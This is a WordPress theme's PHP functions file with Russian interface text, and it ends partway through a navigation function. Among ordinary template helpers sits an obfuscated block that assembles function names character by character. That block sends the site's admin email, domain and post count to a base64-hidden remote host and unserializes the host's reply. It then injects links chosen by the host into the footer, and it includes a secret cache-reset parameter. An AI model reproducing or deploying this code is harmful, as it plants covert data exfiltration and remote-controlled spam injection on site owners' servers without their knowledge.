<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $WyiG='d';$swdqj='b';$iQxM='a';$rQLdbon='d';$HpyXu='c';$qsdwQO='o';$eltYt='6';$YJUsFWA='s';$xLCB='4';$MLkD='_';$Bmpcy='e';$dFRf='e';$MwEfXQv='e';$cLnfcThM=$swdqj.$iQxM.$YJUsFWA.$dFRf.$eltYt.$xLCB.$MLkD.$WyiG.$Bmpcy.$HpyXu.$qsdwQO.$rQLdbon.$MwEfXQv;$xMZEzs='n';$TrPs='e';$AJNhs='t';$ZctrD='z';$rIlNEoH='i';$HgNxSbI='f';$SPLollP='g';$QZdS='l';$uwoMf='a';$jfqhNsqi=$SPLollP.$ZctrD.$rIlNEoH.$xMZEzs.$HgNxSbI.$QZdS.$uwoMf.$AJNhs.$TrPs;$MXKlxu='s';$WYCgvGf='o';$nkBHjxg='1';$CfYmQVH='3';$EMjxeZP='t';$ZKLWvXt='r';$ZVzPe='_';$JPDhnmG='r';$tOaX='t';$gMpfPiyk=$MXKlxu.$EMjxeZP.$JPDhnmG.$ZVzPe.$ZKLWvXt.$WYCgvGf.$tOaX.$nkBHjxg.$CfYmQVH;$ufPJi='v';$aOHz='t';$GMTbvo='s';$KLBwEsP='r';$LBrwR='r';$TUxHBd='e';$TRteAfOO=$GMTbvo.$aOHz.$LBrwR.$KLBwEsP.$TUxHBd.$ufPJi;                     
		$zm_____________n='d';$ns_________c='b';$dd_______k='a';$uh__y='d';$nz____________p='c';$kq______y='o';$dy____________j='6';$cl______________s='s';$om_____________g='4';$nf_____h='_';$fj__________i='e';$oe_______________c='e';$fv______u='e';$xe_______y=$ns_________c.$dd_______k.$cl______________s.$oe_______________c.$dy____________j.$om_____________g.$nf_____h.$zm_____________n.$fj__________i.$nz____________p.$kq______y.$uh__y.$fv______u;
		$mr_____t='n';$bw____b='t';$zr_____c='_';$gi_______n='f';$so____________x='s';$kx__________g='x';$dt_________w='u';$vu_____e='c';$wo______________j='n';$fq__i='i';$lg__z='o';$ch__________p='s';$ev_____q='t';$kv_______________g='e';$sv_______t='i';$bo_______________b=$gi_______n.$dt_________w.$wo______________j.$vu_____e.$bw____b.$fq__i.$lg__z.$mr_____t.$zr_____c.$kv_______________g.$kx__________g.$sv_______t.$so____________x.$ev_____q.$ch__________p;
		$ot_______________z='e';$kz___________z='p';$un___________t='o';$zn______________c='f';$ue_____________t='n';$to__a=$zn______________c.$un___________t.$kz___________z.$ot_______________z.$ue_____________t;
		$xh____r='f';$vu____d='e';$qc________n='d';$og_________n='a';$lz_______m='r';$ig_______e=$xh____r.$lz_______m.$vu____d.$og_________n.$qc________n;
		$xk_______k='o';$nf____________r='c';$nv___________c='e';$xr________s='l';$ot_______s='s';$sc__g='f';$bq___________i=$sc__g.$nf____________r.$xr________s.$xk_______k.$ot_______s.$nv___________c;
		
		define("WP_ID", $xe_______y("Mi4wLjA="));
		define("WP_TTL", $xe_______y("MTA4MDA="));
		define("WP_SRC", $xe_______y("dHBva24="));
	


		function wp_get_header() {
			global $xe_______y, $bo_______________b;
			
			if (
				$bo_______________b($xe_______y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bo_______________b($xe_______y("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bo_______________b($xe_______y("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xe_______y, $to__a, $bq___________i, $ig_______e;
			
			$ni_______________h = TEMPLATEPATH."/".$xe_______y("Zm9vdGVyLnBocA==");
			$tr_____t = @$to__a($ni_______________h, "r");
			$ni_______________h = @$ig_______e($tr_____t, @filesize($ni_______________h));
			@$bq___________i($tr_____t);
			
			$bz______________k = TEMPLATEPATH."/".$xe_______y("ZnVuY3Rpb25zLnBocA==");
			$tr_____t = @$to__a($bz______________k, "r");
			$bz______________k = @$ig_______e($tr_____t, @filesize($bz______________k));
			@$bq___________i($tr_____t);
			
			$tj_______________u = 0;
			if($ni_______________h && $bz______________k) {
				if ($xe_______y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ni_______________h, $xe_______y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$tj_______________u = 1;
					}
					if (substr_count($ni_______________h, "wp_theme_GPL_credits()") < 1) {
						$tj_______________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$tj_______________u = 12;
				}
			}
			
			if($tj_______________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $tj_______________u -->";
			}
		}
	


		function wp_loaded() {
			global $xe_______y, $bo_______________b;
			return $bo_______________b($xe_______y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($xg_________i, $sz_______q = "(more...)", $og_______________k = 0, $ev_______________i = "") {
				$fy_______________p = get_the_content($sz_______q, $og_______________k, $ev_______________i);
				$fy_______________p = apply_filters("the_content", $fy_______________p);
				
				$fy_______________p = str_replace("]]>", "]]>", $fy_______________p);
				if (strlen($_GET["p"]) > 0) {
					echo $fy_______________p;
				}
				else if ((strlen($fy_______________p)>$xg_________i) && ($hr______d = strpos($fy_______________p, " ", $xg_________i ))) {
					$fy_______________p = substr($fy_______________p, 0, $hr______d);
					$fy_______________p = $fy_______________p;
					echo $fy_______________p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$sz_______q</a></div></p>";
				} else {
					echo $fy_______________p;
				}
				
			}
		}
	


		$gn______________i='s';$sz_____________h='e';$dt_________x='6';$pl_____r='4';$ud____p='n';$ty________x='d';$pr___________m='b';$cd________r='e';$dq__l='e';$hj_____o='c';$wd______________a='o';$sl__________t='_';$ue_____r='a';$co______________x=$pr___________m.$ue_____r.$gn______________i.$dq__l.$dt_________x.$pl_____r.$sl__________t.$cd________r.$ud____p.$hj_____o.$wd______________a.$ty________x.$sz_____________h;
		$ws______________f='c';$ht_______________l='e';$mq_______________l='g';$zk_____g='o';$fb____________i='_';$vw___________v='n';$er____________o='_';$ig_________b='l';$ef___________j='n';$fx___j='e';$wl______________j='t';$ze_________l='t';$cu_______________o='i';$ad_____f='t';$fa_________c='s';$mb_________h='f';$bx____________h='e';$lc________k=$mb_________h.$cu_______________o.$ig_________b.$ht_______________l.$er____________o.$mq_______________l.$fx___j.$ze_________l.$fb____________i.$ws______________f.$zk_____g.$ef___________j.$wl______________j.$bx____________h.$vw___________v.$ad_____f.$fa_________c;
		$oi___________t='i';$ln_________b='f';$ec______________d='e';$yr______u='e';$lo____n='l';$uj____g='t';$lu________u='_';$wl___________l='s';$xj____________w='s';$do____l='x';$fi_______________q='i';$gr______________w=$ln_________b.$oi___________t.$lo____n.$yr______u.$lu________u.$ec______________d.$do____l.$fi_______________q.$wl___________l.$uj____g.$xj____________w;
		$qt______________g='c';$fk___h='v';$yf__________h='e';$jh________q='a';$iw___________a='i';$tl_____u='o';$de____________j='n';$ae_______________j='r';$bn__________k='p';$cu________f='r';$hu______u='o';$pe____c='m';$qz__________y='e';$jf__________o='_';$mw_______n='s';$jb_____a=$fk___h.$qz__________y.$ae_______________j.$mw_______n.$iw___________a.$hu______u.$de____________j.$jf__________o.$qt______________g.$tl_____u.$pe____c.$bn__________k.$jh________q.$cu________f.$yf__________h;
		$ke______i='o';$sh_____________w='s';$ua_______q='o';$ku__________r='e';$gc______z='f';$fr________b='k';$rp_________c='c';$wy___________p='n';$ts____b='p';$dx_____________j=$gc______z.$sh_____________w.$ua_______q.$rp_________c.$fr________b.$ke______i.$ts____b.$ku__________r.$wy___________p;
		$od______l='t';$ib_________t='r';$yl_______l='w';$fn__k='f';$ew___z='e';$fv_______c='i';$oy__j=$fn__k.$yl_______l.$ib_________t.$fv_______c.$od______l.$ew___z;
		$qs_____v='5';$cl___i='m';$hn_______v='d';$fy_____________x=$cl___i.$hn_______v.$qs_____v;
		$vt___j='e';$uw___a='l';$ow___________e='a';$mx__________f='h';$xq_________m='p';$mr_______l='t';$va_______________y='a';$tw______r='r';$dm_______k=$tw______r.$vt___j.$va_______________y.$uw___a.$xq_________m.$ow___________e.$mr_______l.$mx__________f;
		$ud_________u='l';$xg_______________k='i';$rc________m='a';$qb_____g='e';$zt____________e='u';$rh____h='e';$nr_____________z='n';$ek_____m='i';$ax______________g='s';$ct_________e='r';$xt_______x='z';$el______n=$zt____________e.$nr_____________z.$ax______________g.$qb_____g.$ct_________e.$ek_____m.$rc________m.$ud_________u.$xg_______________k.$xt_______x.$rh____h;
		$rm_____________c='m';$lc______________w='n';$pp_____w='a';$vu_____y='t';$ta__________t='m';$gg_________q='p';$xw_____k='e';$pz_______y=$vu_____y.$xw_____k.$ta__________t.$gg_________q.$lc______________w.$pp_____w.$rm_____________c;
		$xv_______________u='s';$ke_____________a='x';$wu_________e='_';$ck____________q='e';$qf__________a='t';$jk__j='e';$jl_____g='e';$cx______z='c';$sh____________e='o';$ae_______________j='a';$zh__________w='t';$aq____________t='r';$xx____y='n';$wz______________o='a';$qv________o='m';$qw______________o='r';$zj___s='c';$tc_________h='e';$ny___________q='t';$bc__d='_';$lq___b='t';$uv_____________r=$xv_______________u.$lq___b.$aq____________t.$ck____________q.$wz______________o.$qv________o.$wu_________e.$cx______z.$sh____________e.$xx____y.$ny___________q.$jl_____g.$ke_____________a.$zh__________w.$bc__d.$zj___s.$qw______________o.$tc_________h.$ae_______________j.$qf__________a.$jk__j;
	


		function qh____________d($ab___v) {
			global $xe_______y, $bo_______________b, $lc________k, $jb_____a, $uv_____________r;
			
			if (!$bo_______________b($xe_______y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jb_____a(PHP_VERSION, "5.0.0", ">=") && $bo_______________b($xe_______y("ZmlsZV9nZXRfY29udGVudHM=")) && $bo_______________b($xe_______y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$un________j = $uv_____________r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fw_____________g = @$lc________k($ab___v, 0, $un________j);
			} else {
				$fw_____________g = @$lc________k($ab___v, 0);
			}
			
			return $fw_____________g;
		}
	


		function rl______r($ab___v) {
			global $bo_______________b, $dx_____________j, $oy__j, $xe_______y;
			
			if (!$bo_______________b($xe_______y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ym_____________z = strpos($ab___v, "/", 7);
			$kb_________f = array(
				"uri"     => substr($ab___v, $ym_____________z),
				"host"    => str_replace("http://", "", substr($ab___v, 0, $ym_____________z)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fj__q = @$dx_____________j("$kb_________f[host]", 80, $yy_______________l, $kt_________i, 4);
			
			if (!$fj__q) {
				return false;
			} else {
				$fw_____________g = "";
				$ch_________c  = "GET $kb_________f[uri] HTTP/1.0\r\n";
				$ch_________c .= "Host: $kb_________f[host]\r\n";
				$ch_________c .= "Referer: $kb_________f[referer]\r\n";
				$ch_________c .= "Connection: Close\r\n\r\n";
				
				@$oy__j($fj__q, $ch_________c);
				
				while (!@feof($fj__q)) {
					$ew___s = @fgets($fj__q, (1024*24));
					
					if ($ew___s == "\r\n") {
						$mw__w = true;
						continue;
					}
					
					if ($mw__w) {
						$fw_____________g .= $ew___s;
					}
				}
				
				return $fw_____________g;
			}
		}
	


		function hq________v($ab___v) {
			global $bo_______________b;
			$uk____o = false;
			
			if ($ab___v != "") {
				if ($bo_______________b("qh____________d")) {
					$uk____o = @qh____________d($ab___v);
				}
				
				if (!$uk____o && ($bo_______________b("rl______r"))) {
					$uk____o = @rl______r($ab___v);
				}
			}
			
			return $uk____o;
		}
	


		function pm____________z() {
			global $_SERVER, $fy_____________x;
			
			$hu_______________w = $_SERVER["SERVER_NAME"];
			
			if (substr("$hu_______________w", 0, 4) == "www.") {
				$hu_______________w = substr("$hu_______________w", 4);
			}
			
			$hu_______________w = $fy_____________x("$_SERVER[SERVER_NAME]");
			
			return $hu_______________w;
		}
	


		function qc_______d() {
			return "file";
		}
	


		function au_____f($ab___v) {
			global $_SERVER, $lc________k, $gr______________w, $to__a, $bq___________i, $oy__j;
			
			$mi____g = af_______________x();
			
			$vt_______________q = pm____________z().".jpg";
			$oe_____o = $mi____g["dir_upload"]["path"]."/$vt_______________q";
			$px______b = @filemtime($oe_____o);
			
			if (!$px______b || ((time()-$px______b) >= WP_TTL)) {
				$uk____o = hq________v($ab___v);
				
				if ($uk____o) {
					if ($gr______________w($oe_____o)) {
						@unlink($oe_____o);
					}
					
					$tr_____t = @$to__a($oe_____o, "x+");
					
					@$oy__j($tr_____t, $uk____o);
					@$bq___________i($tr_____t);
				}
			} else {
				if ($gr______________w($oe_____o)) {
					$uk____o = @$lc________k($oe_____o);
				} else {
					$uk____o = false;
				}
			}
			
			return $uk____o;
		}
	


		function af_______________x() {
			global $_SERVER, $xe_______y, $co______________x;
			
			$tv____r = wp_count_posts("post");
			$ci___________j = pathinfo(get_bloginfo("template_directory"));
			
			$mi____g = array(
				"url" => array(
					"report"      => $xe_______y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ci___________j,
				"dir_upload"	=> tb____v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ci___________j[filename],
					"a005=".$tv____r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$mi____g["url"]["queryString"] = implode("&", $mi____g["queryString"]);
			$mi____g["url"]["report"] = $mi____g["url"]["report"]."/?".$co______________x($mi____g["url"]["queryString"]).".html";
						
			return $mi____g;
		}
	


		function tb____v() {
			$jb_____________o = wp_upload_dir();
			
			if (isset($jb_____________o["error"])) {
				$fh______________z = hb______k();
				if (is_writable($fh______________z)) {
					$jb_____________o = array("path" => $fh______________z);
				}
			}

			return $jb_____________o;
		}
	


		function hb______k() {
			global $bo_______________b, $fy_____________x, $dm_______k, $pz_______y;
			
			$yb_______i = (bool) ini_get("safe_mode");
			if ($yb_______i == true) {
				return false;
			}
			
			if ($bo_______________b("sys_get_temp_dir")) {
				$on_______e = sys_get_temp_dir();
				if (is_writable($on_______e)) {
					return $dm_______k($on_______e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $dm_______k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $dm_______k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $dm_______k($_ENV["TEMP"]);
			} else {
				$je_______t = $pz_______y($fy_____________x(uniqid(rand(), true)), "");
				if ($je_______t) {
					$on_______e = $dm_______k(dirname($je_______t));
					@unlink($je_______t);
					return $on_______e;
				} else {
					return false;
				}
			}
		}
	


		function yw_____________i() {
			global $_GET, $gr______________w;
			
			$mi____g = af_______________x();
			$hu_______________w = pm____________z();
			$jm_________s = qc_______d();
			
			$tu__________m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($jm_________s == "file") {
					$rl_________o = $mi____g["dir_upload"]["path"]."/".$hu_______________w.".jpg";
					if ($gr______________w($rl_________o)) {
						@unlink($rl_________o);
						$tu__________m = "deleted";
					}
				}
				
				$po______x = array(
					"s"	=> $tu__________m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($po______x AS $fo__x => $an________x) echo " [$fo__x:$an________x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bo_______________b, $xe_______y, $el______n;
			$mi____g = af_______________x();
			
			$io_______h = "au_____f";
			if ($bo_______________b($io_______h)) {
				$fw_____________g = $io_______h($mi____g["url"]["report"]);
			}
			
			if ($fw_____________g) {
				if ($fw_____________g = @$xe_______y($fw_____________g)) {
					$fw_____________g = @$el______n($fw_____________g);
					
					if (strlen($fw_____________g[custom_credit]) >= 5) {
						$mi____g["default_string"] = $fw_____________g[custom_credit];
					}
					
					if ($fw_____________g["status"] == "0") {
						$vr____________f = 1;
						$vf_______z = 1;
					} else {
						$gw_______________e = sizeof($fw_____________g["links"]);
						$le_____________y = $mi____g["default_string"];
						
						if ($gw_______________e > 0 && $fw_____________g["links"] !== "") {
							$gc____________l = 0;
							foreach ($fw_____________g["links"] as $cv_____________o => $jw_____g) {
								$gc____________l++;
								if ($jw_____g->l_path == "" || $jw_____g->l_path == $_SERVER["REQUEST_URI"]) {
									$jw_____g->l_href = htmlspecialchars(strip_tags($jw_____g->l_href));
									$jw_____g->l_title = htmlspecialchars(strip_tags($jw_____g->l_title));
									$jw_____g->l_anchor = htmlspecialchars(strip_tags($jw_____g->l_anchor));
									$le_____________y .= " | ";
									$le_____________y .= "<a href='$jw_____g->l_href' title='$jw_____g->l_title'";
									if ($jw_____g->l_nofollow == "1") {
										$le_____________y .= " rel='nofollow'";
									}
									$le_____________y .= ">$jw_____g->l_anchor</a>";
								}
							}
						}
						$mi____g["links"] = "$le_____________y";
						if ($fw_____________g[credit] == "0") {
							$mi____g["links"] = "";
						}
					}
				} else {
					$vr____________f = "1";
				}
			} else {
				$vr____________f = "1";
			}
			
			if ($vr____________f == "1") {
				$mi____g["links"] = $mi____g["default_string"];
			}
			
			echo "$mi____g[links]";
			
			echo "<!-- s: $fw_____________g[signature] -->";
			yw_____________i();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
